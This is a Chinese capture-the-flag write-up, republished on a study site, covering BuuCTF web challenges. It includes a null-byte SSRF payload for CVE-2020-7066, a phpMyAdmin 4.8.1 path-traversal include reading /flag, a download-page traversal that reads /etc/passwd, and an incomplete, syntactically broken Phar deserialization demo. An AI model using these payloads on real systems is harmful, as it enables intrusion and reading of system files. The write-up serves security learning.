BuuCTF Web Writeup 第三部分

时间:2020-08-02 11:13:15 来源:

【摘要】 BuuCTF Web Writeup 第三部分考必过小编为大家整理了关于BuuCTF Web Writeup 第三部分的信息,希望可以帮助到大家!

BuuCTF Web Writeup 第三部分

标签:manifest   txt   meta   rom   pap   option   如何   compress   let   

[GKCTF2020]cve版签到

题目提示

cve-2020-7066
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com 

题目原型

#79329 get_headers() silently truncates after a null byte

This was tested on PHP 7.3, but the function has always had this bug.

The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.

解题方法

?url=http://127.0.0.123%00.ctfhub.com

收集信息

善用php bug搜索漏洞

(未完成)[安洵杯 2019]easy_web

[GWCTF 2019]我有一个数据库

解题方法

扫描后发现存在/phpmyadmin/,访问后得知版本信息 4.8.1

phpmyadmin 4.8.1存在文件包含漏洞,构造?target=db_datadict.php%253f/../../../../../../../../../flag

(未完成)[BJDCTF2020]Mark loves cat

(未完成)[CISCN2019 华北赛区 Day1 Web1]Dropbox

上传测试后发现只能上传图片类型文件

抓包

POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1

filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png

放包之后会显示文件内容

目录穿越

filename=../../../../../etc/passwd

显示结果

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin

题目中的主要文件

.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php

class.php是核心文件

class.php(简化)

<?php

class User {
    public $db;

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        ...
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
    
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

File类中的close()方法存在RCE vulnerability

Q: 如何利用RCE vulnerability?

代码中并不 unserialize(),但存在文件上传点

Attack PHP Deserialization Vulnerability via Phar

the Phar File Structure

0x00 A Stub

It can be interpreted as a flag and the format is xxx<?php xxx; __HALT_COMPILER();?>.The front content is not limited, but it must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize this file as a phar file.

0x01 A Manitest Describing the Contents

A phar file is essentially a compressed file, in which the permissions, attributes and other information of each compressed file are included. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks.

0x02 The File Contents

It is the contents of compressed file.

0x03 A signature for verifying Phar integrity

phar file format only

Demo

Construct a phar file according to the file structure, and PHP has a built-in class to handle related operations

Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.

class Demo {
  @unlink("phar.phar");
  $phar = new Phar("phar.phar"); // suffix must be phar
  $phar->startBuffering();
  $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
  $o = new file();
  $o->output = "phpinfo();";
  $phar->setMetadata($o); // store custom meta-data in manifest
  $phar->addFromString("test.txt", "test"); // compressed file
  $phar->stopBuffering(); // automatic computation of signature
};

BuuCTF Web Writeup 第三部分

标签:manifest   txt   meta   rom   pap   option   如何   compress   let   

以上就是BuuCTF Web Writeup 第三部分的内容,更多资讯请及时关注考必过网站,最新消息小编会第一时间发布,大家考试加油!

上一篇      下一篇
前端相关推荐 更多>>
Web前端工程师需要学习的技能清单 【Web前端基础知识】如何使用Canvas绘制圆形 【Web前端基础知识】CSS的定位机制之定位 【Web前端基础知识】CSS的定位机制之标准流、浮动 【Web前端基础知识】关于Js中this的指向 【Web前端基础知识】HTML表单 【Web前端基础知识】CSS3 2D 变换 【Web前端基础知识】过渡动画和关键帧动画
前端热点专题 更多>>
热点问答
国家公务员考试年龄限制是多少 公务员国考和省考考试内容有什么区别 函授大专学历能不能考公务员 国家公务员考试考点能自己选择吗 新闻学专业能报考2022年公务员考试吗 什么是联合培养研究生 什么是破格录取研究生 什么人不适合读研 研究生报名户口所在地填什么 研究生结业和毕业有什么区别
网站首页 网站地图 返回顶部
考必过移动版 https://m.kaobiguo.net